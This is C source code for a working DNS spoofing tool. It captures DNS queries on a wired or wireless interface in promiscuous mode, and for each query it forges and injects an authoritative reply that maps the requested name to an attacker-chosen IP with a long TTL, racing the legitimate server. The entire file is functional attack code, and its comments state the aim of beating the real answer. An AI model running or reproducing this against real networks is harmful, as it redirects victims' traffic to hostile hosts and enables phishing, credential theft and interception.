#include <pcap.h>
#include <stdio.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <netinet/in.h>		
#include <arpa/inet.h>	
#include <netinet/if_ether.h>
#include <netinet/ether.h>
#include <net/ethernet.h>
#include <sys/socket.h>
#include <signal.h>


#include "dnsspoof.h"
#include "netdefs.h"
#include "usage.h"
#include "config.h"


static pcap_t *descr;

/********************/
/* Libnet functions */
/********************/

int 
send_fake_rr(const u_char *packet, size_t sz, 
	     struct libnet_ethernet_hdr *eth,
	     struct libnet_ipv4_hdr *ipv4, 
	     struct libnet_udp_hdr *udp, 
	     struct libnet_dnsv4_hdr *dns, 
	     u_char *query, 
	     dnsspoof_opts_t *opts)
{
    u_int16_t flags;

    /* 
     * If no domain to spoof was given, we need to rebuild the RR_A
     * with the queried domain
     */
#ifdef DEBUG
    printf("========================================\n");
    libnet_dump_hexa(query, strlen(query)+1+4);
#endif
	
    printf("\033[1;33mSpoofed query : %s\033[0;m\n", query);


    if (!opts->domain || !opts->rr)
    {
	opts->rr = libnet_build_dnsv4_rr_a(
	    query,    			/* the name - extracted directly from the query
		       			 * as it is a NULL terminated string */
	    LIBNET_DNS_TYPE_A,    	/* type */
	    LIBNET_DNS_CLASS_IN,  	/* class */
	    65535,                	/* ttl */
	    4,                    	/* rdlength (addr is 4 bytes) */
	    opts->fakeip.addr_ip, 	/* address */
	    NULL,                 	/* payload */
	    0,                    	/* payload_s */
	    opts->ctx, 			/* l */
	    opts->rr);			/* ptag */
	
	if (opts->rr < 0)
	{
	    fprintf(stderr, "cant build RR: %s\n", libnet_geterror(opts->ctx));
	    exit(EXIT_FAILURE);
	}
    }

    /* 
     * For the query, it is easy: we just have to copy the one we
     * received!
     */
    opts->query = libnet_build_bytes(
	query,                    /* the bytes to copy */
	strlen(query)+1+4,        /* their size */
	LIBNET_PBUF_DNSV4_RR_A_H, /* type of pbuf */
	0,                        /* csum size */
	0,                        /* no flags */
	NULL,                     /* no update function */
	opts->ctx,                /* context */
	opts->query);

    if (opts->query < 0)
    {
	fprintf(stderr, "Can't copy query: %s\n", libnet_geterror(opts->ctx));
	exit(EXIT_FAILURE);
    }

    /*
     * The DNS header always needs to be recomputed to update the id
     * field
     */
    libnet_dnsv4_pack_flags(flags, 
			    LIBNET_DNS_REPLY,        /* msg is a reply */
			    LIBNET_DNS_OPCODE_QUERY, /* normal query */
			    1,  /* answer is aithoritative */
			    0,  /* no truncation */
			    1,  /* recursive desired */
			    1,  /* recursion available */
			    0,  /* Z is always supposed to be 0 */
			    0); /* this is a query, RCODE is supposed to be 0 */


    opts->dns = libnet_build_dnsv4(
	ntohs(dns->id),       /* keep the same ID */
	flags,
	1,                    /* # queries */
	1,                    /* # answers */
	0,                    /* # auth RR */
	0,                    /* # addi RR */
	NULL,                 /* payload */
	0,                    /* payload_s */
	opts->ctx, 
	opts->dns);

    if (opts->dns < 0)
    {
	fprintf(stderr, "Can't build DNS header : %s\n", libnet_geterror(opts->ctx));
	exit(EXIT_FAILURE);
    }

    /*
     * For udp, just need to reverse the ports
     */
    opts->udp = libnet_build_udp(
	53,                   /* src port */
	ntohs(udp->uh_sport), /* dst port */
	0,                    /* len */ 
	0,                    /* csum */
	NULL, 
	0, 
	opts->ctx, 
	opts->udp);
    
    if (opts->udp < 0)
    {
	fprintf(stderr, "Can't build UDP header : %s\n", libnet_geterror(opts->ctx));
	exit(EXIT_FAILURE);
    }
    
    /*
     * IP is not that difficult too 
     */
    opts->ip = libnet_build_ipv4_ng(
	0,                   	/* hl */
	0,                    	/* TOS */
	0,			/* len */
	242,                  	/* IP ID */
	IP_DF,                	/* IP Frag */
	64,                   	/* TTL */
	IPPROTO_UDP,          	/* protocol */
	0,                    	/* checksum */
	*((u_int32_t*)&ipv4->ip_dst),
	*((u_int32_t*)&ipv4->ip_src),
	NULL,                 	/* payload */
	0,                    	/* payload size */
	opts->ctx,            	/* libnet handle */
	opts->ip);            	/* ptag */

    if (opts->ip < 0)
    {
	fprintf(stderr, "cant build IP header : %s\n", libnet_geterror(opts->ctx));
	exit(EXIT_FAILURE);
    }


    if (opts->ctx->injection_type&LIBNET_LINK)
    {
	opts->eth = libnet_build_ethernet(
	    eth->ether_shost,
	    eth->ether_dhost,
	    ETHERTYPE_IP,
	    NULL,                 /* payload */
	    0,                    /* payload size */
	    opts->ctx,            /* libnet handle */
	    opts->eth);           /* libnet id */
	if (opts->eth < 0)
	{
	    fprintf(stderr, "Can't build Ethernet header : %s\n", libnet_geterror(opts->ctx));
	    exit(EXIT_FAILURE);
	}
    }


    if (libnet_write(opts->ctx) < 0)
    {
	fprintf(stderr, "Error: bad write(): %s\n", 
		libnet_geterror(opts->ctx));
	libnet_dump(stdout,opts->ctx);
	pcap_breakloop(descr);
	return -1;
    }
#ifdef DEBUG
    libnet_dump(stdout, opts->ctx);
    printf("========================================\n\n");
#endif

    return 1;
}

/**********************/
/* Callback functions */
/**********************/
/* Send packets to the host who made the request (hope the first will be received before
 * the answser of the legitimate server) */
void callback_dnsspoof(u_char *args, const struct pcap_pkthdr *pkthdr, const u_char *packet)
{
	u_int16_t flags = 0;
	int i;
	dnsspoof_opts_t *opts;
	size_t offset;
	struct libnet_ethernet_hdr *eth;
	struct libnet_ipv4_hdr *ipv4;
	struct libnet_udp_hdr *udp;
	struct libnet_dnsv4_hdr *dns;
	u_char *query, *ptr_q;
	u_int16_t qtype, qclass;
	int offset_capture = 0;
	int is_llc = 0;

	if (pkthdr->len < LIBNET_ETH_H + LIBNET_IPV4_H + LIBNET_UDP_H + LIBNET_UDP_DNSV4_H)
	{
	    fprintf(stderr, "Malformed DNS packet (too short sz=%zu)\n", pkthdr->len);
	    return ;
	}

	opts = (dnsspoof_opts_t *)args;

	switch(pcap_datalink(descr))
	{
		case DLT_EN10MB:		/* We got ethernet packets */
			is_llc = 0;
			offset_capture = 0;
#ifdef DEBUG
			printf("---- Captured : ethernet ----\n");
#endif
			break;
		case DLT_IEEE802_11:		/* We got 802.11 packets */
			is_llc = 1;
			offset_capture = 24;
#ifdef DEBUG
			printf("---- Captured : 802.11 only ----\n");
#endif
			break;
		case DLT_PRISM_HEADER:		/* We got Prism+802.11 "headered" packets */
			is_llc = 1;
			offset_capture = 144 + 24; /* Prism + 802.11 headers */
#ifdef DEBUG
			printf("---- Captured : Prism + 802.11 ----\n");
#endif
			break;
		default:
#ifdef DEBUG
			printf("---- UNKNOWN TYPE CAPTURED ----\n");
			printf("---- Exiting... ----\n");
#endif
			exit(EXIT_FAILURE);
	}
	
		
#ifdef DEBUG
	if(offset_capture == (144 + 24))
	{
		printf("Prism + 802.11\n");
		libnet_dump_hexa((char*)packet, offset_capture);
	}
#endif

	if(is_llc == 1)
		eth = (struct libnet_802_2_hdr *)(packet + offset_capture);	/* 802.11 case */	
	else
		eth = (struct libnet_ethernet_hdr *)packet;			/* Ethernet case */

#ifdef DEBUG
	if(is_llc == 1)
	{
		printf("802.11 LLC Header\n");
		libnet_dump_hexa((char*)eth, LIBNET_802_2SNAP_H);
	}
	else /* Ethernet case */
	{
		printf("Ethernet Header\n");
		libnet_dump_hexa((char*)eth, LIBNET_ETH_H);
	}
#endif
	
	if(is_llc == 1)
		ipv4 = (struct libnet_ipv4_hdr *)(packet + offset_capture + LIBNET_802_2SNAP_H); /* skip previous headers */
	else
		ipv4 = (struct libnet_ipv4_hdr *)(packet + offset_capture + LIBNET_ETH_H); /* skip previous headers */
		

#ifdef DEBUG
	printf("IPv4\n");
	libnet_dump_hexa((char*)ipv4, ipv4->ip_hl<<2);
#endif

	/* 
	 * Compute offset to the flags field in the DNS header 
	 *   14             : ethernet header
	 *   ipv4->ip_hl<<2 : IPv4 header's length * 4
	 *   8              : UDP header
	 */
	if(is_llc == 1)
		offset = (ipv4->ip_hl<<2) + offset_capture + LIBNET_802_2SNAP_H;
	else
		offset = (ipv4->ip_hl<<2) + offset_capture + LIBNET_ETH_H;
	udp = (struct libnet_udp_hdr *)(packet + offset);

#ifdef DEBUG
	printf("UDP\n");
	libnet_dump_hexa((char*)udp, LIBNET_UDP_H);
#endif

	offset += LIBNET_UDP_H;
	dns = (struct libnet_dnsv4_hdr *)(packet + offset);

#ifdef DEBUG
	printf("DNS\n");
	libnet_dump_hexa((char*)dns, LIBNET_UDP_DNSV4_H);
#endif

	flags = ntohs(dns->flags);
	if ( (flags&LIBNET_DNS_QR_MASK) != 0)
	{
	    printf("forget, packet is a response (flags=%x)\n", flags);
	    return ;
	}

	offset += LIBNET_UDP_DNSV4_H; /* skip DNS header */
	ptr_q = packet + offset;
	query = packet + offset;

#ifdef DEBUG
	printf("Query\n");
	libnet_dump_hexa(query, pkthdr->len-offset);
#endif	

	/* compare domain if one was provided */
	if (opts->domain && strncasecmp(opts->domain, query, strlen(opts->domain)) )
	{
	    printf("Wrong domain ... skipping\n");
	    return;
	}
	
	/* if query was badly forged, there can be no \0 at the end,
	 * so I cant use strlen() */
	for (i=offset; i<pkthdr->len && *ptr_q; i++, ptr_q++)
	    ;
	if (i == pkthdr->len) /* XXX: need to be tested */
	{
	    fprintf(stderr, "Invalid DNS packet: query is not NULL terminated\n");
	    return;
	}
	offset = i+1; /* skip the null byte */
	ptr_q++;
	if (pkthdr->len - offset < 4)
	{
	    fprintf(stderr, "Invalid DNS packet: type or class missing\n");
	    return;	    
	}

	/* ptr_q is now pointing to type */
	qtype = ntohs( *((u_int16_t*)ptr_q));
	ptr_q += sizeof(qtype);
	qclass = ntohs( *((u_int16_t*)ptr_q));

#ifdef DEBUG
	printf("DNS ID = %d (0x%x)\n",dns->id, dns->id);
#endif
	send_fake_rr(packet, pkthdr->len, eth, ipv4, udp, dns, query, opts);
}



/****************************/
/* Packet capture functions */
/****************************/
/* Grab dns queries on "device" from "srchost" and run the callback function (spoofing) for "hostdst" IP
 * If device == NULL, then use pcap_lookupdev
 * If srchost == NULL, then grab EVERY UDP DNS PAQUETS (promisc) */
int grab_dns_queries(int injmode, char *device, char *device_out, char *srchost, char *fakeip, char *domain, int eth_mode)
{
	char *filter;
	char *dev;
	char errbuf[PCAP_ERRBUF_SIZE];
	bpf_u_int32 maskp;	/* subnet mask			*/
	bpf_u_int32 netp;	/* ip				*/
	struct bpf_program fp;	/* hold compiled program 	*/
	dnsspoof_opts_t opts;
	u_int32_t sz;

	if(device_out == NULL)
	{
		device_out = device;
	}

	filter = malloc(MAX_FILTER_LONG*sizeof(char));
	if(filter == NULL)
		err_mem();

	if( (srchost != NULL) && (strlen(srchost) < MAX_IP_LONG) )
	{
		//sprintf(filter,"udp and dst port 53 and src host %s and not host 192.168.0.128 and not host 192.168.0.189", srchost);
		sprintf(filter,"udp and dst port 53 and src host %s", srchost);
	}
	else if( (srchost == NULL) )
	{
		//sprintf(filter,"udp and dst port 53 and not host 192.168.0.128 and not host 192.168.0.189");
		sprintf(filter,"udp and dst port 53");
	}
	else
	{
		return (EXIT_FAILURE);		/* Bad IP entry ? */
	}

	memset(&opts, 0, sizeof(opts));

#ifdef DEBUG
	printf("\t\tFilter = %s\n\t\tSRChost = %s", filter, srchost);
#endif

	if(device == NULL)	/* Let's use interface of our choice! */
		dev = pcap_lookupdev(errbuf);
	else
		dev = device;

	if(dev == NULL)
	{
#ifdef DEBUG
		printf("\t\tdev = NULL\n");
#endif
		fprintf(stderr,"%s\n", errbuf);
		exit(EXIT_FAILURE);
	}

	/*printf("\t\tUsing interface %s\n", dev); */

	pcap_lookupnet(dev, &netp, &maskp, errbuf);	/* Get conf for this interface */
	if ((descr = pcap_open_live(dev, BUFSIZ, PROMISC_MODE, -1, errbuf)) == NULL)
	{
		fprintf(stderr,"%s\n", errbuf);
		exit(EXIT_FAILURE);
	}

#ifdef DEBUG
	if(PROMISC_MODE > 0)
		printf("\t\tPromisc mode enabled\n");
	else
		printf("\t\tPromisc mode disabled\n");
#endif
	if(pcap_compile(descr, &fp, filter, 0, netp) == -1)
	{
		fprintf(stderr, "** Error with pcap_compile\n");
	}

	if(pcap_setfilter(descr, &fp) == -1)
	{
		fprintf(stderr, "** Error with filter\n");
		exit(EXIT_FAILURE);
	}
	
	/* libnet's stuff */
	//opts.ctx = libnet_init(injmode, dev, errbuf);
	opts.ctx = libnet_init(injmode, device_out, errbuf);
	if (!opts.ctx)
	{
	    fprintf(stderr,"libnet_init() failed: %s\n", errbuf);
	    exit(EXIT_FAILURE);
	}

	if (libnet_resolve_ascii2addr4(fakeip, strlen(fakeip), 
				      &opts.fakeip, 0, errbuf) < 0)
	{
	    fprintf(stderr, "Bad fake IP address: %s (err=%s)\n", 
		    optarg, errbuf);
	    exit(EXIT_FAILURE);
	}
	
        /*
	 * Even if a malicious user passes arguments field with
	 * "transformable" character, it can at most double the length
	 * of the input
	 */
	if (domain)
	{
	    sz = 2*(strlen(domain) + 1);
	    opts.domain = malloc(  sz * sizeof(u_int8_t));
	    memset(opts.domain, 0, sz);
	    if (libnet_txt2dns(domain, strlen(domain) + 1, 
			       opts.domain, &sz) < 0)
	    {
		fprintf(stderr, "Error in libnet_txt2dns()\n");
		exit(EXIT_FAILURE);
	    }
#ifdef DEBUG
	    libnet_dump_hexa(opts.domain, 2*(strlen(domain) + 1));
#endif
	}

	pcap_loop(descr, -1, callback_dnsspoof, (u_char*)&opts);

	printf("Bye !\n");

	free(filter);
	if (domain) free(opts.domain);
	libnet_destroy(opts.ctx);
	pcap_freecode(&fp);
	pcap_close(descr);
	return (EXIT_SUCCESS);
}
